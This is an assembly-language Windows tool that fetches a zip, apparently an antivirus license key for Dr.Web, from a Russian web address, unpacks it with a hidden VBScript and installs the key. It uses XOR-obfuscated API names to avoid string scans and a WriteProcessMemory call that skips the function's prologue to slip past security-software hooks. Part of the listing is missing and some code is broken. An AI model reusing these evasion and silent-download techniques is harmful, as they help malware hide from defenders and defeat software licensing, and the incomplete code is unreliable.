;написано и скомпилировано в assembler editor
;/thread261755-assembler+editor.html
.386
.model flat, stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
Crypt proto :DWORD
include include\windows.inc
include include\kernel32.inc
include include\user32.inc
include include\comdlg32.inc
include include\shell32.inc
include include\ole32.inc
includelib lib\shell32.lib
includelib lib\ole32.lib
includelib lib\comdlg32.lib
includelib lib\user32.lib
includelib lib\kernel32.lib
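; chr$("text") — place a NUL-terminated string literal in .data and expand
; to `OFFSET <label>` so the macro can be used directly as a push/invoke
; operand (every use in this file — e.g. push chr$("C:\key.zip") — relies on
; the expansion yielding an address). The listing had a bare EXITM, which
; expands to nothing and would leave `push` / `invoke` with a missing operand;
; the angle brackets were most likely eaten by HTML stripping.
chr$ MACRO any_text:VARARG
    LOCAL txtname
    .data
    txtname db any_text,0      ; literal lives in .data, not inline in .code
    .code
    EXITM <OFFSET txtname>     ; value the macro stands for at the call site
ENDM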
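.data
; API/library names are stored XOR 0Eh-obfuscated so they do not show up in a
; plain string scan of the binary; `Crypt` decodes them in place at run time.
; Decoded values: urldtf -> "URLDownloadToFileA", shlexc -> "ShellExecuteA",
; krnl32 -> "kernel32". This is obfuscation, not confidentiality — the key is
; one constant byte and the decoder ships in the same module.
urldtf db '[\BJay`baojZaHgbkO',0
shlexc db ']fkbbKvkm{zkO',0
krnl32 db 'ek|`kb=<',0
; NOTE(review): the '<' (obfuscated '2') and everything after it up to the
; middle of WndProc appear to have been dropped from this listing by HTML tag
; stripping; the definitions referenced later (urlmon, unzip, txtbuff, path,
; hFile, htemp, pv, dirs, hwndEdit, MenuName, ClassName, AppName, Button5ID,
; the WndProc header) presumably lived in that lost span.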
call decrypt
call SetLib
push 0
push 0
push chr$("C:\key.zip")
push chr$("http://yootoo.ru/drweb32.zip")
push 0
call eax
.ENDIF
invoke Sleep,1000
invoke GetFileAttributes,chr$("C:\key.zip")
.IF eax==INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("Íå óäàëîñü!"),chr$("Îøèáêà"),MB_ICONERROR
.ELSEIF eax!=INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("OK!"),chr$("ÎK"),MB_OK
.ENDIF
.ENDIF
.ENDIF
.IF ax==Button5ID
shr eax,16
.IF ax==BN_CLICKED
invoke GetWindowTextLength,hwndEdit
.IF eax==0
invoke MessageBox,0,chr$("Îïðåäåëèòå äèðåêòîðèþ!"),chr$("Îøèáêà"),MB_ICONERROR
.ELSEIF eax>0
call create_script
invoke ShellExecute,0,chr$("open"),chr$("C:\unzip.vbs"),0,0,SW_HIDE
invoke lstrcat,addr txtbuff,chr$("\drweb32.key")
invoke GetFileAttributes,addr txtbuff
.IF eax!=INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("Òåêóùèé êëþ÷ óäàëåí"),chr$("Ñîîáùåíèå"),MB_OK
invoke DeleteFile,addr txtbuff
.ENDIF
invoke MessageBox,0,addr txtbuff,chr$("ÓÑÏÅÕ!êëþ÷ ïîìåùåí â ïàïêó"),0
invoke MoveFile,addr path,addr txtbuff
.ENDIF
invoke DeleteFile,chr$("C:\drweb.key")
invoke DeleteFile,chr$("C:\key.zip")
invoke DeleteFile,chr$("C:\unzip.vbs")
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
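WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
    ; Register the window class, create the main window and run the message
    ; loop. Returns msg.wParam from WM_QUIT, or 0 if the class could not be
    ; registered or the window could not be created (the original checked
    ; neither and would have continued with ShowWindow(NULL)).
    ; WndProc, MenuName, ClassName and AppName are defined elsewhere in the file.
    LOCAL wc:WNDCLASSEX
    LOCAL msg:MSG
    LOCAL hwnd:HWND

    mov wc.cbSize,SIZEOF WNDCLASSEX
    mov wc.style,CS_HREDRAW or CS_VREDRAW
    mov wc.lpfnWndProc,OFFSET WndProc
    mov wc.cbClsExtra,NULL
    mov wc.cbWndExtra,NULL
    mov eax,hInst
    mov wc.hInstance,eax
    mov wc.hbrBackground,COLOR_BTNFACE+1    ; system colour index + 1 is accepted in place of an HBRUSH
    mov wc.lpszMenuName,OFFSET MenuName
    mov wc.lpszClassName,OFFSET ClassName
    invoke LoadIcon,NULL,IDI_APPLICATION
    mov wc.hIcon,eax
    mov wc.hIconSm,eax
    invoke LoadCursor,NULL,IDC_ARROW
    mov wc.hCursor,eax

    invoke RegisterClassEx,addr wc
    .IF eax == 0
        ; registration failed (ATOM 0): nothing can be created, bail out
        xor eax,eax
        ret
    .ENDIF

    invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName,ADDR AppName,\
        WS_SYSMENU,CW_USEDEFAULT,CW_USEDEFAULT,210,170,\
        NULL,NULL,hInst,NULL
    .IF eax == NULL
        ; window creation failed: do not Show/Update a NULL handle
        xor eax,eax
        ret
    .ENDIF
    mov hwnd,eax
    invoke ShowWindow,hwnd,SW_SHOWNORMAL
    invoke UpdateWindow,hwnd

    ; standard message pump; GetMessage returns 0 once WM_QUIT is retrieved
    .WHILE TRUE
        invoke GetMessage,ADDR msg,NULL,0,0
        .BREAK .IF (!eax)
        invoke TranslateMessage,ADDR msg
        invoke DispatchMessage,ADDR msg
    .ENDW
    mov eax,msg.wParam                       ; exit code passed to PostQuitMessage
    ret
WinMain endp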
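get_dir proc
    ; Show the folder picker (SHBrowseForFolder with the BROWSEINFO in `dirs`)
    ; and copy the chosen path into txtbuff.
    ; Out: flags from `cmp pv,0` — ZF set when the user cancelled (pv == NULL);
    ;      eax is not meaningful (unchanged from the original contract).
    ;      txtbuff is an empty string if no path was produced.
    ; Fixes vs. the original: the PIDL is no longer dereferenced/freed when the
    ; dialog was cancelled (NULL PIDL), CoInitialize is balanced with
    ; CoUninitialize so the per-call reference count no longer leaks, and a
    ; failed path conversion does not leave a stale path in txtbuff.
    mov byte ptr txtbuff,0                  ; start from an empty string
    invoke CoInitialize,0
    invoke SHBrowseForFolder,ADDR dirs
    mov pv,eax
    .IF eax != NULL
        ; user picked a folder: convert the PIDL to a path, then release it
        invoke SHGetPathFromIDList,pv,ADDR txtbuff
        invoke CoTaskMemFree,pv
    .ENDIF
    invoke CoUninitialize
    cmp pv,0                                ; must be last: the calls above clobber flags
    ret
get_dir endp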
call_bk proc hWnd:DWORD,uMsg:DWORD,lParam:DWORD,lpData:DWORD
    ; BrowseCallbackProc for SHBrowseForFolder. Once the dialog exists
    ; (BFFM_INITIALIZED) it pre-selects the folder given by lpData, which is the
    ; BROWSEINFO.lParam value the caller supplied; per the BFFM_SETSELECTION
    ; contract, wParam = TRUE says lParam is a path string rather than a PIDL.
    ; Every other message is ignored. Always returns 0.
    xor eax,eax
    cmp uMsg,BFFM_INITIALIZED
    jne @F                                   ; not the init message: nothing to do
    invoke SendMessage,hWnd,BFFM_SETSELECTION,TRUE,lpData
    xor eax,eax                              ; SendMessage clobbered eax
@@:
    ret
call_bk endp
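create_script proc
    ; Write the VBS unzip helper (`unzip`, sizeof unzip-1 bytes — presumably
    ; dropping its terminating NUL) to C:\unzip.vbs.
    ; Out: eax = nonzero if the file was created and WriteFile succeeded,
    ;      0 otherwise. The original ignored CreateFile failure and handed
    ;      INVALID_HANDLE_VALUE to WriteFile/CloseHandle; the existing caller
    ;      (`call create_script`) ignores eax, so this is backward compatible.
    ; SECURITY NOTE(review): the script is written to a fixed, predictable
    ; path in the root of C:\ and then launched via ShellExecute by the caller.
    ; Because CREATE_NEW fails if the file already exists, a C:\unzip.vbs
    ; planted by another local user would not be overwritten — and the caller
    ; would still execute the planted script. The caller should abort when
    ; this returns 0, and a per-user temp directory (GetTempPath) with a
    ; randomised name would be a safer location than C:\.
    invoke CreateFile,chr$("C:\unzip.vbs"), GENERIC_READ or GENERIC_WRITE,0,0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL,0
    .IF eax == INVALID_HANDLE_VALUE
        xor eax,eax                          ; could not create: report failure
        ret
    .ENDIF
    mov hFile,eax
    invoke WriteFile,hFile,addr unzip,sizeof unzip-1,addr htemp,0
    push eax                                 ; keep WriteFile's BOOL across CloseHandle
    invoke CloseHandle,hFile
    pop eax
    ret
create_script endp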
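Crypt proc s:dword
    ; XOR every byte of the NUL-terminated string at s with 0Eh, in place.
    ; Used to decode the obfuscated API/library names in .data (e.g. urldtf ->
    ; "URLDownloadToFileA"); XOR with a constant is symmetric, so a second call
    ; re-encodes. This is string obfuscation, not encryption.
    ; In:  s = pointer to a writable NUL-terminated string
    ; Out: eax = s + lstrlen(s); ecx and flags clobbered
    ; Fixes vs. the original: an empty string no longer runs the loop 2^32
    ; times (`loop` with ecx == 0 wraps), the memory operand carries an
    ; explicit byte size (`xor [eax],imm` has no implied width), and the slow
    ; `loop` instruction is replaced by dec/jnz.
    invoke lstrlen,s
    mov ecx,eax                              ; ecx = bytes remaining
    mov eax,s                                ; eax = current byte
    jecxz crypt_done                         ; nothing to do for ""
crypt_next:
    xor byte ptr [eax],0Eh
    inc eax
    dec ecx
    jnz crypt_next
crypt_done:
    ret
Crypt endp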
decrypt proc
; Decode the obfuscated .data strings (urldtf, krnl32, urlmon) via Crypt,
; but first perform one WriteProcessMemory call that bypasses the first
; 5 bytes of kernel32!WriteProcessMemory: the hot-patchable prologue
; (mov edi,edi / push ebp / mov ebp,esp) is replayed here and execution
; jumps to WriteProcessMemory+5. This is the classic user-mode inline-hook
; evasion — a hook written over the export's first bytes is never executed.
; NOTE(review): the argument count looks wrong. WriteProcessMemory takes 5
; stdcall arguments (hProcess, lpBaseAddress, lpBuffer, nSize,
; lpNumberOfBytesWritten) but only 4 values are pushed below (addr nob,
; addr buff, lp+1, hProcess), so nSize would receive `addr nob` and the 5th
; argument whatever already sat on the stack; stdcall cleanup of 20 bytes
; against 16 pushed also leaves esp off by 4 (masked by the ebp-based
; epilogue). Confirm against the intended call before relying on this.
; NOTE(review): the write targets lp+1 — the byte after the first opcode of
; the `invoke Crypt` below, i.e. this procedure's own code — so .code must be
; writable for it to succeed; the value written is the single byte 0Fh.
; NOTE(review): `mov eax,addr nob` — ADDR is normally an INVOKE-only
; operator; `lea eax,nob` is the usual form. Confirm this assembles.
LOCAL nob:dword
LOCAL buff:byte
mov eax,addr nob
push eax ; pushed first -> ends up as the 4th argument (see NOTE above)
mov buff,1111b ; the one byte (0Fh) to be written
mov eax,addr buff
push eax ; lpBuffer
mov eax,lp ; code label used as its own address
inc eax ; lpBaseAddress = lp+1
invoke GetCurrentProcess
push eax ; hProcess
mov eax,WriteProcessMemory ; import thunk: jmp dword ptr [IAT slot] (FF 25 disp32)
mov eax,[eax+2] ; address of the IAT slot (skip the 2 opcode bytes)
mov eax,[eax] ; resolved kernel32.WriteProcessMemory
add eax,5 ; skip the 5-byte hot-patch prologue
push l2 ; fake return address, as `call` would have pushed
push ebp ; replay `push ebp`
mov ebp,esp ; replay `mov ebp,esp`
jmp eax ; continue inside kernel32.WriteProcessMemory+5; it returns to l2
l2:
lp:
invoke Crypt,addr urldtf ; -> "URLDownloadToFileA"
invoke Crypt,addr krnl32 ; -> "kernel32"
invoke Crypt,addr urlmon ; urlmon is defined in the .data span not shown here
ret
decrypt endp
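SetLib proc
    ; Resolve the download routine at run time: LoadLibrary on the name in
    ; `urlmon`, then GetProcAddress for the name in `urldtf`. Both strings are
    ; XOR-0Eh obfuscated in .data and must already have been decoded by
    ; `decrypt` (urldtf decodes to "URLDownloadToFileA").
    ; Out: eax = function address, or 0 if the library or the export is missing.
    ;      The original passed a NULL module to GetProcAddress and returned 0,
    ;      which the caller then used as `call eax`; callers must test for 0.
    ; SECURITY NOTE(review): the caller uses this to fetch
    ; http://yootoo.ru/drweb32.zip over plaintext HTTP with no signature or
    ; hash check and then unpacks and installs it — anyone on the network path
    ; can substitute the payload. LoadLibrary by bare name is also subject to
    ; DLL search-order hijacking from the application directory.
    invoke LoadLibrary,addr urlmon
    .IF eax == NULL
        ret                                  ; library not found: eax is already 0
    .ENDIF
    invoke GetProcAddress,eax,addr urldtf
    ret
SetLib endp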
end start